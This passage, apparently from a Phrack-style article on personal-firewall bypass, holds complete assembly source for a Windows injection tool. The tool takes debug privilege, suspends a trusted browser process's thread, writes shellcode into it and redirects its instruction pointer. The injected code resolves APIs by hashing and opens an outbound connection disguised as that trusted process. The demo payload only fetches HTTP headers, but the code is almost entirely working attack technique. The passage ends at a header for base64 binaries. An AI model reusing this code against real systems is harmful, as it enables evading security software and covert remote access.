+        MOV     pWSACleanup, 0       ; we will need these for error -
+        MOV     ws32base, 0          ; checks lateron
+
+        ADD     EAX,[EAX+03CH]       ; pointer to IMAGE_NT_HEADERS
+        MOV     EAX,[EAX+078H]       ; RVA of exports directory
+        ADD     EAX,k32base          ; since RVA: add the base address
+        MOV     expbase,EAX          ; IMAGE_EXPORTS_DIRECTORY
+                        
+        MOV     EAX,[EAX+020H]       ; RVA of the AddressOfNames array
+        ADD     EAX,k32base          ; add the base address
+                        
+        MOV     ECX,[EAX]            ; ECX: RVA of the first string
+        ADD     ECX,k32base          ; add the base address
+        
+        MOV     EAX,0                ; EAX will serve as a counter
+        JMP     M2                   ; start looping
+
+M1:     INC     EAX                  ; Increase EAX every loop
+M2:     MOV     EBX, 0               ; EBX will be the calculated hash
+
+HASH:   MOV     EDX, EBX
+        SHL     EBX, 05H
+        SHR     EDX, 01BH
+        OR      EBX, EDX
+        MOV     EDX, 0
+        MOV      DL, [ECX]           ; Copy current character to DL
+        ADD     EBX, EDX             ; and add DL to the hash value
+        INC     ECX                  ; increase the string pointer
+        MOV      DL, [ECX]           ; next character in DL, now:
+        CMP     EDX, 0               ; check for null character
+        JNE     HASH
+
+
+        ; This is where we take care of the forwarders.
+        ; we will always subtract the number of forwarders
+        ; that already occured from our iterator (EAX) to
+        ; retrieve the appropriate offset from the second
+        ; array. 
+
+        PUSH    EAX                  ; Safe EAX to the stack
+        SUB     EAX,forwards         ; Subtract forwards
+        IMUL    EAX,4                ; addresses are DWORD's
+        INC     ECX                  ; Move the ECX pointer to the
+                                     ; beginning of the next name
+
+        MOV     EDX, expbase         ; Load exports directory
+        MOV     EDX, [EDX+01CH]      ; EDX: array of entry points
+        ADD     EDX, k32base         ; add the base address
+        MOV     EDX, [EDX+EAX]       ; Lookup the Function RVA
+        ADD     EDX, k32base         ; add the base address
+        MOV     pGetProcAddress, EDX ; This will be correct once
+                                     ; the loop is finished.
+
+        ; Second stage of our forwarder check: If the 
+        ; "entry point" of this function points to the
+        ; next string in array #1, we just found a forwarder.
+ 
+        CMP     EDX, ECX             ; forwarder check
+        JNE     FWD                  ; ignore normal entry points
+        INC     forwards             ; This was a forwarder
+
+FWD:    POP     EAX                  ; Restore EAX iterator
+        CMP     EBX, 099C95590H      ; hash value for "GetProcAddress"
+        JNE     M1
+
+        ; We have everything we wanted. I use a simple macro
+        ; to load the functions by applying pGetProcAddress.
+
+        LPROC   k32base, sGetModuleHandle, pGetModuleHandle
+        LPROC   k32base, sLoadLibrary, pLoadLibrary
+        LPROC   k32base, sFreeLibrary, pFreeLibrary
+
+
+        PSHS    sUser32              ; we need user32.dll
+        CALL    pGetModuleHandle     ; assume it is already loaded
+        EJUMP   INJECT_ERROR         ; (we could use LoadLibrary)
+        MOV     u32base,EAX          ; got it
+
+        PSHS    sWS2_32              ; most important: winsock DLL
+        CALL    pLoadLibrary         ; LoadLibrary("ws2_32.dll");
+        EJUMP   INJECT_ERROR
+        MOV     ws32base, EAX
+
+
+        LPROC   u32base,sMessageBox,pMessageBox
+        LPROC   ws32base,sWSAStartup,pWSAStartup
+        LPROC   ws32base,sWSACleanup,pWSACleanup
+        LPROC   ws32base,sSocket,pSocket
+        LPROC   ws32base,sConnect,pConnect
+        LPROC   ws32base,sSend,pSend
+        LPROC   ws32base,sRecv,pRecv
+        LPROC   ws32base,sClose,pClose
+
+        PSHS   wsa                   ; see our artificial data segment
+        PUSH   2                     ; Version 2 is fine
+        CALL   pWSAStartup           ; Do the WSAStartup()
+        CMP    EAX, 0
+        JNE    INJECT_ERROR
+
+        PUSH   0
+        PUSH   SOCK_STREAM           ; A normal stream oriented socket
+        PUSH   AF_INET               ; for Internet connections.
+        CALL   pSocket               ; Create it.
+        CMP    EAX, INVALID_SOCKET
+        JE     INJECT_ERROR
+        MOV    EBX,EAX
+
+        PUSH   SIZEOF sockaddr       ; Connect to www.phrack.org:80
+        PSHS   sAddr                 ; hardcoded structure
+        PUSH   EBX                   ; that's our socket descriptor
+        CALL   pConnect              ; connect() to phrack.org
+        CMP    EAX, SOCKET_ERROR
+        JE     INJECT_ERROR
+
+        PUSH   0                     ; no flags
+        PUSH   028H                  ; 40 bytes to send
+        PSHS   sRequ                 ; the GET string
+        PUSH   EBX                   ; socket descriptor
+        CALL   pSend                 ; send() HTTP request
+        CMP    EAX, SOCKET_ERROR
+        JE     INJECT_ERROR
+
+
+        ; We now have to receive the server's reply. We only
+        ; want the HTTP header to display it in a message box
+        ; as an indicator for a successful bypass. 
+ 
+
+        MOV    ECX, 0                ; number of bytes received
+
+PP:     MOV    EDX, iBase 
+        ADD    EDX, OFFSET sRepl-inject
+
+        ADD    EDX, ECX              ; EDX is the current position inside
+                                     ; the string buffer
+        PUSH   EDX
+        PUSH   ECX
+
+        PUSH   0                     ; no flags
+        PUSH   1                     ; one byte to receive
+        PUSH   EDX                   ; string buffer
+        PUSH   EBX                   ; socket descriptor
+        CALL   pRecv                 ; recv() the byte      
+
+        POP    ECX
+        POP    EDX
+
+        CMP    AL, 1                 ; one byte received ?
+        JNE    PPE                   ; an error occured
+        CMP    ECX,2                 ; check if we already received
+        JS     PP2                   ; more than 2 bytes
+
+        MOV    AL, [EDX]             ; this is the byte we got
+        CMP    AL, [EDX-2]           ; we are looking for <CRLF><CRLF>
+        JNE    PP2
+        CMP    AL, 10                ; we found it, most probably.
+        JE     PPE                   ; we only want the headers.
+        
+PP2:    INC    ECX
+        CMP    ECX,600               ; 600 byte maximum buffer size
+        JNE    PP
+
+
+PPE:    PUSH   EBX                   ; socket descriptor
+        CALL   pClose                ; close the socket
+
+        PUSH   64                    ; neat info icon and an ok button
+        PSHS   sCap                  ; the caption string
+        PSHS   sRepl                 ; www.phrack.org's HTTP header
+        PUSH   0                     
+        CALL   pMessageBox           ; display the message box.
+
+        JMP    INJECT_SUCCESS        ; we were successful.
+
+INJECT_SUCCESS:
+        MOV    EAX, 1                ; return values are passed in EAX
+        JMP    INJECT_CLEANUP
+ 
+INJECT_ERROR:
+        MOV    EAX, 0                ; boolean return value (success)
+
+INJECT_CLEANUP:
+        PUSH   EAX                   ; save our return value
+        CMP    pWSACleanup,0
+        JE     INJECT_DONE
+        CALL   pWSACleanup           ; perform cleanup
+        CMP    ws32base, 0           ; check if we have loaded ws2_32
+        JE     INJECT_DONE
+        PUSH   ws32base
+        CALL   pFreeLibrary          ; release ws2_32.dll
+
+INJECT_DONE:
+        POP    EAX                   ; retore the return value  
+        RET                          ; and return
+
+inject  ENDP
+
+inject_end: END Main
+
+
+
+
+-[0x0C] :: tiny.exe source code ------------------------------------------
+
+This is the ASM source code for the second bypass program.
+
+.386
+.MODEL flat, stdcall
+
+  INCLUDE   windows.inc
+  INCLUDE   kernel32.inc
+  INCLUDE   advapi32.inc
+
+  bypass    PROTO                     ; Tiny Firewall Bypass
+  inject    PROTO, iBase:DWORD        ; injected function
+  getsvc    PROTO, pProcessInfo:DWORD ; finds running, trusted process
+  getdbg    PROTO                     ; enables the SE_DEBUG privilege
+        
+
+;       The PSHS macro is used to push the address of some
+;       structure onto the stack inside the remote process'
+;       address space. iBase contains the address where the
+;       injected code starts. 
+
+PSHS    MACRO  BUFFER
+        MOV    EDX, iBase
+        ADD    EDX, OFFSET BUFFER - inject
+        PUSH   EDX
+        ENDM
+               
+;       The LPROC macro assumes that pGetProcAddress holds
+;       the address of the GetProcAddress() API call and
+;       simulates its behaviour. PROCNAME is a string inside
+;       the injected code that holds the function name and
+;       PROCADDR is a DWORD variable inside the injected
+;       code that will retrieve the address of that function.
+;       BASEDLL, as the name suggests, should hold the 
+;       base address of the appropriate DLL.
+         
+LPROC   MACRO  BASEDLL, PROCNAME, PROCADDR
+        PSHS   PROCNAME
+        PUSH   BASEDLL
+        CALL   pGetProcAddress
+        EJUMP  INJECT_ERROR
+        MOV    PROCADDR, EAX
+        ENDM
+
+EJUMP   MACRO  TARGET_CODE ; jump when EAX is 0.
+        CMP    EAX, 0
+        JE     TARGET_CODE
+        ENDM        
+            
+
+.DATA
+        ; This is the name of a trusted process to search for.
+        ; If you know what you are doing, you can play with
+        ; if and see whether other applications work with the
+        ; current code (aka hijack primary thread). 
+        ; "OUTLOOK.EXE" works as well btw.
+       
+        TRUSTED      DB  "IEXPLORE.EXE",0
+        
+        
+        SE_DEBUG     DB  "SeDebugPrivilege",0  ; debug privilege
+        IEV_NAME     DB  "TINY0",0             ; our event name
+        IEV_HANDLE   DD  ?                     ; event handle        
+        FUNCSZE      EQU iend-istart           ; inject's size
+        CODESZE      EQU 19                    ; size of our "shellcode"
+        ALLSZE       EQU FUNCSZE + CODESZE     ; complete size
+        FUNCADDR     EQU istart                ; offset of inject        
+        
+        ; JUMPDIFF is the number of bytes from the beginning of
+        ; the shellcode to the jump instruction. It is required
+        ; to calculate the value of JUMP_ADDR, see below.
+        
+        JUMPDIFF       EQU 14
+        
+
+        ; This "shellcode" will be injected to the trusted
+        ; process directly in fron of the injector procedure
+        ; itself. It will simply call the injector function
+        ; with its base address as the first argument and
+        ; jump back to the address where we hijacked the 
+        ; thread afterwards. The addresses of our injected
+        ; function (PUSH_ADDR) and the original EIP of the
+        ; hijacked thread (JUMP_ADDR) will be calculated 
+        ; at runtime, of course.
+        
+        SHELLCODE    LABEL BYTE
+        
+         PUSHAD_CODE DB 060H ; PUSHAD
+         PUSHFD_CODE DB 09CH ; PUSHFD
+         PUSH_CODE   DB 068H ; PUSH <function address>
+         PUSH_ADDR   DD ?
+         CALL_CODE   DB 0E8H ; CALL <function address>
+         CALL_ADDR   DD 07H
+         POPFD_CODE  DB 09DH ; POPFD
+         POPAD_CODE  DB 061H ; POPAD
+         JUMP_CODE   DB 0E9H ; JUMP <original EIP>
+         JUMP_ADDR   DD ?
+                             ; <injector function>
+                             ; ...        
+ 
+.CODE
+
+
+Main: ; not much to do except calling
+      ; the bypass function in this sample.
+      
+        INVOKE  bypass
+        INVOKE  ExitProcess, 0
+
+
+getdbg  PROC  ; enables the SE_DEBUG privilege for ourself
+        LOCAL   token:HANDLE
+        LOCAL   priv:TOKEN_PRIVILEGES 
+        LOCAL   luid:LUID
+        INVOKE  LookupPrivilegeValue, 0,OFFSET SE_DEBUG, ADDR luid
+        EJUMP   DBE0
+        MOV     priv.PrivilegeCount, 01H
+        MOV     priv.Privileges.Attributes, 02H
+        MOV     EAX,luid.LowPart
+        MOV     priv.Privileges.Luid.LowPart,EAX
+        MOV     EAX,luid.HighPart
+        MOV     priv.Privileges.Luid.HighPart,EAX
+        INVOKE  GetCurrentProcess
+        MOV     ECX,EAX
+        INVOKE  OpenProcessToken,ECX,020H, ADDR token
+        MOV     ECX, token
+        CMP     ECX, 0
+        JE      DBE0
+        INVOKE  AdjustTokenPrivileges,ECX,0,ADDR priv,0,0,0
+        MOV     ECX,EAX
+        INVOKE  CloseHandle, token
+        MOV     EAX,ECX
+DBE0:   RET
+getdbg  ENDP
+
+
+
+getsvc  PROC,   pProcessInfo:DWORD
+
+        ; This function fills a PROCESS_INFORMATION
+        ; structure with the ID and handle of the
+        ; required trusted process and its primary
+        ; thread. The tool helper API is used to
+        ; retrieve this information.
+
+        LOCAL   p32:PROCESSENTRY32
+        LOCAL   t32:THREADENTRY32
+        
+        LOCAL   hShot:DWORD
+        
+        MOV     p32.dwSize, SIZEOF PROCESSENTRY32
+        MOV     t32.dwSize, SIZEOF THREADENTRY32
+        
+        INVOKE  getdbg ; we need SE_DEBUG first
+        
+        ; Create a snapshot of all processes and
+        ; threads. 06H is the appropriate bitmask
+        ; for this purpose, look it up if you 
+        ; dont trust me.
+        
+        INVOKE  CreateToolhelp32Snapshot,06H,0
+        MOV     hShot,EAX
+        
+        ; Start to search for the trusted process.
+        ; We will compare the name of the process'
+        ; primary module with the string buffer
+        ; TRUSTED until we find a match.
+        
+        INVOKE  Process32First, hShot, ADDR p32
+        CMP     EAX, 0
+        JE      GSE1
+
+GSL:    LEA     EDX, p32.szExeFile
+        INVOKE  lstrcmpi, EDX, OFFSET TRUSTED
+        
+        CMP     EAX, 0 ; lstrcmpi is not case sensitive!
+        JE      GSL1   ; good, we found the process
+        
+        INVOKE  Process32Next, hShot, ADDR p32
+        
+        CMP     EAX, 0 ; no more processes,
+        JE      GSE1   ; no success
+        JMP     GSL    ; otherwise, continue loop
+        
+        ; We have found an instance of the trusted
+        ; process, continue to retrieve information
+        ; about its primary thread and gain an open
+        ; handle to both the process itself and the
+        ; thread. To find the thread, we have to
+        ; loop through all thread entries in our 
+        ; snapshot until we discover a thread that
+        ; has been created by the process we found.
+        
+GSL1:   INVOKE  Thread32First, hShot, ADDR t32
+        MOV     EBX, 0
+
+TSL:    MOV     EDX, t32.th32OwnerProcessID
+        CMP     EDX, p32.th32ProcessID
+        JE      TSL0
+        INVOKE  Thread32Next, hShot, ADDR t32
+        CMP     EAX, 0 ; no more threads (weird),
+        JE      GSE1   ; no success 
+        JMP     TSL    ; otherwise, continue loop
+        
+        ; Now, since we have got the ID's of both
+        ; the process itself and the primary thread,
+        ; use OpenProcess() and OpenThread() to 
+        ; get a handle to both of them. You are right,
+        ; OpenThread is NOT a documented call, but
+        ; it looks like that was rather an accident.
+        ; It is exported by kernel32.dll just like
+        ; OpenProcess().
+        
+TSL0:   MOV     EDX, pProcessInfo     ; the structure address
+
+        MOV     EAX,p32.th32ProcessID ; copy the process ID
+        MOV     [EDX+08H], EAX
+        
+        MOV     EAX, t32.th32ThreadID ; copy the thread ID
+        MOV     [EDX+0CH], EAX
+        
+        PUSH    EDX                   ; safe the address
+        
+        
+        INVOKE  OpenProcess, PROCESS_ALL_ACCESS, \
+                0, p32.th32ProcessID
+                
+        CMP     EAX, 0
+        JE      GSE1
+        MOV     EBX, EAX
+        
+        INVOKE  OpenThread, THREAD_ALL_ACCESS, 0, \
+                t32.th32ThreadID
+                
+        CMP     EAX, 0
+        JE      GSE1
+        
+        POP     EDX                   ; restore the address
+        MOV     [EDX], EBX            ; copy the process handle
+        MOV     [EDX+04H], EAX        ; copy the thread handle
+        
+        PUSH    1                     ; success
+        JMP     GSE0                   
+           
+GSE1:   PUSH    0                     ; failure
+
+GSE0:   CMP     hShot, 0
+        JE      GSE
+        INVOKE  CloseHandle, hShot    ; cleanup
+
+GSE:    POP     EAX                   ; pop the return value to EAX
+        RET                           ; that's it.
+        
+getsvc  ENDP 
+
+ 
+
+istart:
+
+inject  PROC, iBase:DWORD
+
+
+        LOCAL k32base          :DWORD
+        LOCAL expbase          :DWORD
+        LOCAL forwards         :DWORD
+                        
+        LOCAL pGetProcAddress  :DWORD
+        LOCAL pGetModuleHandle :DWORD
+        LOCAL pLoadLibrary     :DWORD
+        LOCAL pFreeLibrary     :DWORD
+        
+        LOCAL pOpenEvent       :DWORD
+        LOCAL pCloseHandle     :DWORD
+        LOCAL pSetEvent        :DWORD
+             
+        LOCAL pMessageBox      :DWORD
+        LOCAL u32base          :DWORD
+        LOCAL ws32base         :DWORD
+                        
+        LOCAL pWSAStartup      :DWORD
+        LOCAL pWSACleanup      :DWORD
+        
+        LOCAL pSocket          :DWORD
+        LOCAL pConnect         :DWORD
+        LOCAL pSend            :DWORD
+        LOCAL pRecv            :DWORD
+        LOCAL pClose           :DWORD
+                        
+        JMP IG
+
+
+        sGetModuleHandle DB "GetModuleHandleA" ,0
+        sLoadLibrary     DB "LoadLibraryA"     ,0
+        sFreeLibrary     DB "FreeLibrary"      ,0
+        
+        sOpenEvent       DB "OpenEventA"       ,0
+        sCloseHandle     DB "CloseHandle"      ,0
+        sSetEvent        DB "SetEvent"         ,0
+        sFWPEVENT        DB "TINY0"            ,0
+                        
+        sUser32          DB "USER32.DLL"       ,0
+        sMessageBox      DB "MessageBoxA"      ,0
+                        
+        sGLA             DB "GetLastError"     ,0
+        sWLA             DB "WSAGetLastError"  ,0
+                        
+        sWS2_32          DB "ws2_32.dll"       ,0
+        sWSAStartup      DB "WSAStartup"       ,0
+        sWSACleanup      DB "WSACleanup"       ,0
+        sSocket          DB "socket"           ,0
+        sConnect         DB "connect"          ,0
+        sSend            DB "send"             ,0
+        sRecv            DB "recv"             ,0
+        sClose           DB "closesocket"      ,0
+
+        wsa LABEL BYTE
+         wVersion        DW 0
+         wHighVersion    DW 0
+         szDescription   DB WSADESCRIPTION_LEN+1 DUP(0)
+         szSystemStatus  DB WSASYS_STATUS_LEN+1 DUP(0)
+         iMaxSockets     DW 0
+         iMaxUdpDg       DW 0
+         lpVendorInfo    DD 0
+                        
+        sAddr LABEL BYTE
+         sin_family      DW AF_INET
+         sin_port        DW 05000H
+         sin_addr        DD 006EE3745H
+         sin_zero        DQ 0
+                        
+
+                
+        sStartC          DB "SetUp Complete",0
+        sStart           DB "Injector SetUp complete. ", \
+                            "Sending request:",13,10,13,10
+                
+        sRequ            DB "GET / HTTP/1.0",13,10, \
+                            "Host: www.phrack.org",\
+                            13,10,13,10,0
+                        
+        sCap             DB "Injection successful",0
+        sRepl            DB 601 DUP(0)
+
+                  
+IG:     ASSUME  FS:NOTHING           ; This is a MASM error bypass.      
+
+        MOV     EAX, FS:[030H]       ; Get the Process Environment Block
+        TEST    EAX, EAX             ; Check for Win9X
+        JS      W9X
+
+WNT:    MOV     EAX, [EAX+00CH]      ; WinNT: get PROCESS_MODULE_INFO
+        MOV     ESI, [EAX+01CH]      ; Get fLink from ordered module list
+        LODSD                        ; Load the address of bLink into eax
+        MOV     EAX, [EAX+008H]      ; Copy the module base from the list
+        JMP     K32                  ; Work done
+
+W9X:    MOV     EAX, [EAX+034H]      ; Undocumented offset (0x34)
+        LEA     EAX, [EAX+07CH]      ; ...
+        MOV     EAX, [EAX+03CH]      ; ...
+K32:    MOV     k32base,EAX          ; Keep a copy of the base address
+        MOV     pGetProcAddress, 0   ; now search for GetProcAddress
+        MOV     forwards,0           ; Set the forwards to 0 initially
+        
+        MOV     pWSACleanup, 0       ; we will need these for error -
+        MOV     ws32base, 0          ; checks lateron
+        MOV     pOpenEvent, 0
+
+        ADD     EAX,[EAX+03CH]       ; pointer to IMAGE_NT_HEADERS
+        MOV     EAX,[EAX+078H]       ; RVA of exports directory
+        ADD     EAX,k32base          ; since RVA: add the base address
+        MOV     expbase,EAX          ; IMAGE_EXPORTS_DIRECTORY
+                        
+        MOV     EAX,[EAX+020H]       ; RVA of the AddressOfNames array
+        ADD     EAX,k32base          ; add the base address
+                        
+        MOV     ECX,[EAX]            ; ECX: RVA of the first string
+        ADD     ECX,k32base          ; add the base address
+        
+        MOV     EAX,0                ; EAX will serve as a counter
+        JMP     M2                   ; start looping
+
+M1:     INC     EAX                  ; Increase EAX every loop
+M2:     MOV     EBX, 0               ; EBX will be the calculated hash
+
+HASH:   MOV     EDX, EBX
+        SHL     EBX, 05H
+        SHR     EDX, 01BH
+        OR      EBX, EDX
+        MOV     EDX, 0
+        MOV      DL, [ECX]           ; Copy current character to DL
+        ADD     EBX, EDX             ; and add DL to the hash value
+        INC     ECX                  ; increase the string pointer
+        MOV      DL, [ECX]           ; next character in DL, now:
+        CMP     EDX, 0               ; check for null character
+        JNE     HASH
+
+
+        ; This is where we take care of the forwarders.
+        ; we will always subtract the number of forwarders
+        ; that already occured from our iterator (EAX) to
+        ; retrieve the appropriate offset from the second
+        ; array. 
+
+        PUSH    EAX                  ; Safe EAX to the stack
+        SUB     EAX,forwards         ; Subtract forwards
+        IMUL    EAX,4                ; addresses are DWORD's
+        INC     ECX                  ; Move the ECX pointer to the
+                                     ; beginning of the next name
+
+        MOV     EDX, expbase         ; Load exports directory
+        MOV     EDX, [EDX+01CH]      ; EDX: array of entry points
+        ADD     EDX, k32base         ; add the base address
+        MOV     EDX, [EDX+EAX]       ; Lookup the Function RVA
+        ADD     EDX, k32base         ; add the base address
+        MOV     pGetProcAddress, EDX ; This will be correct once
+                                     ; the loop is finished.
+
+        ; Second stage of our forwarder check: If the 
+        ; "entry point" of this function points to the
+        ; next string in array #1, we just found a forwarder.
+ 
+        CMP     EDX, ECX             ; forwarder check
+        JNE     FWD                  ; ignore normal entry points
+        INC     forwards             ; This was a forwarder
+
+FWD:    POP     EAX                  ; Restore EAX iterator
+        CMP     EBX, 099C95590H      ; hash value for "GetProcAddress"
+        JNE     M1
+
+        ; We have everything we wanted. I use a simple macro
+        ; to load the functions by applying pGetProcAddress.
+
+        LPROC   k32base, sGetModuleHandle, pGetModuleHandle
+        LPROC   k32base, sLoadLibrary, pLoadLibrary
+        LPROC   k32base, sFreeLibrary, pFreeLibrary
+        
+        LPROC   k32base, sOpenEvent, pOpenEvent
+        LPROC   k32base, sCloseHandle, pCloseHandle
+        LPROC   k32base, sSetEvent, pSetEvent
+
+
+        PSHS    sUser32              ; we need user32.dll
+        CALL    pGetModuleHandle     ; assume it is already loaded
+        EJUMP   INJECT_ERROR         ; (we could use LoadLibrary)
+        MOV     u32base,EAX          ; got it
+
+        PSHS    sWS2_32              ; most important: winsock DLL
+        CALL    pLoadLibrary         ; LoadLibrary("ws2_32.dll");
+        EJUMP   INJECT_ERROR
+        MOV     ws32base, EAX
+
+
+        LPROC   u32base,sMessageBox,pMessageBox
+        LPROC   ws32base,sWSAStartup,pWSAStartup
+        LPROC   ws32base,sWSACleanup,pWSACleanup
+        LPROC   ws32base,sSocket,pSocket
+        LPROC   ws32base,sConnect,pConnect
+        LPROC   ws32base,sSend,pSend
+        LPROC   ws32base,sRecv,pRecv
+        LPROC   ws32base,sClose,pClose
+
+        PSHS    wsa                  ; see our artificial data segment
+        PUSH    2                    ; Version 2 is fine
+        CALL    pWSAStartup          ; Do the WSAStartup()
+        CMP     EAX, 0
+        JNE     INJECT_ERROR
+
+        PUSH    0
+        PUSH    SOCK_STREAM          ; A normal stream oriented socket
+        PUSH    AF_INET              ; for Internet connections.
+        CALL    pSocket              ; Create it.
+        CMP     EAX, INVALID_SOCKET
+        JE      INJECT_ERROR
+        MOV     EBX,EAX
+
+        PUSH    SIZEOF sockaddr      ; Connect to www.phrack.org:80
+        PSHS    sAddr                ; hardcoded structure
+        PUSH    EBX                  ; that's our socket descriptor
+        CALL    pConnect             ; connect() to phrack.org
+        CMP     EAX, SOCKET_ERROR
+        JE      INJECT_ERROR
+
+        PUSH    0                    ; no flags
+        PUSH    028H                 ; 40 bytes to send
+        PSHS    sRequ                ; the GET string
+        PUSH    EBX                  ; socket descriptor
+        CALL    pSend                ; send() HTTP request
+        CMP     EAX, SOCKET_ERROR
+        JE      INJECT_ERROR
+
+
+        ; We now have to receive the server's reply. We only
+        ; want the HTTP header to display it in a message box
+        ; as an indicator for a successful bypass. 
+ 
+
+        MOV     ECX, 0               ; number of bytes received
+
+PP:     MOV     EDX, iBase 
+        ADD     EDX, OFFSET sRepl-inject
+
+        ADD     EDX, ECX             ; EDX is the current position inside
+                                     ; the string buffer
+        PUSH    EDX
+        PUSH    ECX
+
+        PUSH    0                    ; no flags
+        PUSH    1                    ; one byte to receive
+        PUSH    EDX                  ; string buffer
+        PUSH    EBX                  ; socket descriptor
+        CALL    pRecv                ; recv() the byte      
+
+        POP     ECX
+        POP     EDX
+
+        CMP     AL, 1                ; one byte received ?
+        JNE     PPE                  ; an error occured
+        CMP     ECX,2                ; check if we already received
+        JS      PP2                  ; more than 2 bytes
+
+        MOV     AL, [EDX]            ; this is the byte we got
+        CMP     AL, [EDX-2]          ; we are looking for <CRLF><CRLF>
+        JNE     PP2
+        CMP     AL, 10               ; we found it, most probably.
+        JE      PPE                  ; we only want the headers.
+        
+PP2:    INC     ECX
+        CMP     ECX,600              ; 600 byte maximum buffer size
+        JNE     PP
+
+
+PPE:    PUSH    EBX                  ; socket descriptor
+        CALL    pClose               ; close the socket
+
+        PUSH    64                   ; neat info icon and an ok button
+        PSHS    sCap                 ; the caption string
+        PSHS    sRepl                ; www.phrack.org's HTTP header
+        PUSH    0                     
+        CALL    pMessageBox          ; display the message box.
+
+        JMP     INJECT_SUCCESS       ; we were successful.
+
+INJECT_SUCCESS:
+        PUSH    1                    ; return success
+        JMP     INJECT_CLEANUP
+ 
+INJECT_ERROR:
+        PUSH    0                    ; return failure
+
+INJECT_CLEANUP:
+
+        PUSH    EAX                  ; save our return value
+        CMP     pWSACleanup,0
+        JE      INJECT_DONE
+        CALL    pWSACleanup          ; perform cleanup
+        CMP     ws32base, 0          ; check if we have loaded ws2_32
+        JE      INJECT_DONE
+        PUSH    ws32base
+        CALL    pFreeLibrary         ; release ws2_32.dll
+        
+        ; the following code is the only real difference
+        ; to the code in sample #1. It is used to signal
+        ; an event with the name "TINY0" so that the 
+        ; injector executable knows when this code has
+        ; done its job.
+
+        CMP     pOpenEvent, 0        
+        JE      INJECT_DONE
+        
+        PSHS    sFWPEVENT            ; "TINY0"
+        PUSH    0                    ; not inheritable
+        PUSH    EVENT_ALL_ACCESS     ; whatever
+        CALL    pOpenEvent           ; open the event
+        CMP     EAX, 0
+        JE      INJECT_DONE
+        MOV     EBX, EAX
+        
+        PUSH    EBX
+        CALL    pSetEvent            ; signal the event
+        
+        PUSH    EBX
+        CALL    pCloseHandle         ; close the handle
+
+INJECT_DONE:
+
+        POP     EAX
+        RET                          ; and return
+
+inject  ENDP
+iend:
+
+
+ 
+bypass  PROC
+
+        LOCAL   pinf             :PROCESS_INFORMATION
+        LOCAL   mct              :CONTEXT
+        
+        LOCAL   dwReturn         :DWORD ; return value
+        LOCAL   dwRemoteThreadID :DWORD ; remote thread ID
+        LOCAL   pbRemoteMemory   :DWORD ; remote base address 
+
+        MOV     pinf.hProcess, 0
+        MOV     pinf.hThread, 0
+        
+        ; First of all, creat the even that we need to get
+        ; informed about the progress of our injected code.
+        
+        INVOKE  CreateEvent, 0, 1, 0, OFFSET IEV_NAME
+        EJUMP   BPE5
+        MOV     IEV_HANDLE, EAX
+ 
+        ; Find a suitable, trusted process that we can use
+        ; to hijack its primary thread. We will then pause
+        ; that primary thread and make sure that its suspend
+        ; count is exactly 1. It might seem a bit too careful,
+        ; but if the primary thread is already suspended at 
+        ; the moment of infection, we have a problem. Thus,
+        ; we will rather make sure with some more commands 
+        ; that the thread can be resumed with a single call
+        ; to ResumeThread().
+ 
+        INVOKE  getsvc, ADDR pinf
+        EJUMP   BPE5
+        
+        INVOKE  SuspendThread, pinf.hThread
+        
+        CMP     EAX, 0FFFFFFFFH
+        JE      BPE3
+        CMP     EAX, 0
+        JE      SPOK
+SPL:    INVOKE  ResumeThread, pinf.hThread
+        CMP     EAX, 1
+        JNE     SPL        
+        
+        ; Here we go, the thread is paused and ready to be
+        ; hijacked. First, we get the EIP register along with
+        ; some others that do not interest us.
+        
+SPOK:   MOV     mct.ContextFlags, CONTEXT_CONTROL    
+        INVOKE  GetThreadContext, pinf.hThread, ADDR mct 
+        EJUMP   BPE2
+        
+        ; Now, allocate memory in the remote process' address
+        ; space for the shellcode and the injected function
+        
+        INVOKE  VirtualAllocEx,pinf.hProcess,0,ALLSZE, \
+                MEM_COMMIT,PAGE_EXECUTE_READWRITE
+        EJUMP   BPE2       
+        MOV     pbRemoteMemory,EAX
+
+        
+        MOV     EBX, EAX         ; EBX: remote base address
+        
+        ADD     EAX, CODESZE     ; this is the future address
+        MOV     PUSH_ADDR, EAX   ; of the inject function
+        
+        MOV     EAX, mct.regEip  ; this is the current EIP
+        MOV     EDX, EBX         ; EDX: remote base address
+        ADD     EDX, JUMPDIFF    ; EDX: absolute address of JMP call
+        
+        ; Now we calculate the distance between the JMP call and
+        ; the current EIP. The JMP CPU instruction is followed by
+        ; a double word that contains the relative number of bytes
+        ; to jump away from the current position. This is a signed
+        ; long value which is basically added to the EIP register.
+        ; To calculate the appropriate value, we need to subtract
+        ; the position of the JMP call from the offset we want to
+        ; jump to and subtract another 5 byte since the JMP
+        ; instruction itself has that length.
+        
+        SUB     EAX, EDX
+        SUB     EAX, 05H
+        MOV     JUMP_ADDR, EAX  
+        
+        ; Our shellcode is now complete, we will write it along
+        ; with the inject function itself to the remote process.
+
+        INVOKE  WriteProcessMemory,pinf.hProcess,EBX, \
+                OFFSET SHELLCODE,CODESZE,0
+        EJUMP   BPE1
+        ADD     EBX, CODESZE
+        
+        INVOKE  WriteProcessMemory,pinf.hProcess,EBX, \
+                FUNCADDR,FUNCSZE,0
+        EJUMP   BPE1
+
+        ; Done. Now hijack the primary thread by resetting its
+        ; instruction pointer to continue the flow of execution
+        ; at the offset of our own, injected code
+
+        MOV     EDX, pbRemoteMemory
+        MOV     mct.regEip, EDX
+        
+        INVOKE  SetThreadContext, pinf.hThread, ADDR mct
+        EJUMP   BPE1
+        
+        ; And let the thread continue ...
+        
+        INVOKE  ResumeThread, pinf.hThread
+        CMP     EAX, 0FFFFFFFFH
+        JE      BPE1
+
+        ; Now this is where we are making use of the event we
+        ; created. We will wait until the injected code signals
+        ; the event (at a reasonable timeout) and sleep for
+        ; another second to make sure our code has done its 
+        ; job completely before we start with the cleanup.
+
+        INVOKE  WaitForSingleObject, IEV_HANDLE, 60000
+        CMP     EAX, 0
+        JE      BPOK
+
+        ; However, if something goes wrong it is better
+        ; to terminate the thread as silently as possible.
+        
+        INVOKE  TerminateThread, pinf.hThread, 1
+               
+BPOK:   INVOKE  Sleep, 1000
+              
+BPE1:   INVOKE  VirtualFreeEx,pinf.hProcess, \
+                pbRemoteMemory,ALLSZE,MEM_RELEASE
+                
+BPE2:   INVOKE  ResumeThread, pinf.hThread
+     
+BPE3:   CMP     pinf.hThread, 0
+        JE      BPE4
+        INVOKE  CloseHandle,pinf.hThread
+BPE4:   CMP     pinf.hProcess, 0
+        JE      BPE5
+        INVOKE  CloseHandle,pinf.hProcess
+BPE5:   INVOKE  CloseHandle, IEV_HANDLE
+        RET
+
+bypass  ENDP
+
+END Main
+
+
+
+-[0x0D] :: binaries (base64) ---------------------------------------------
+
+These are the binary version of the two sample applications for
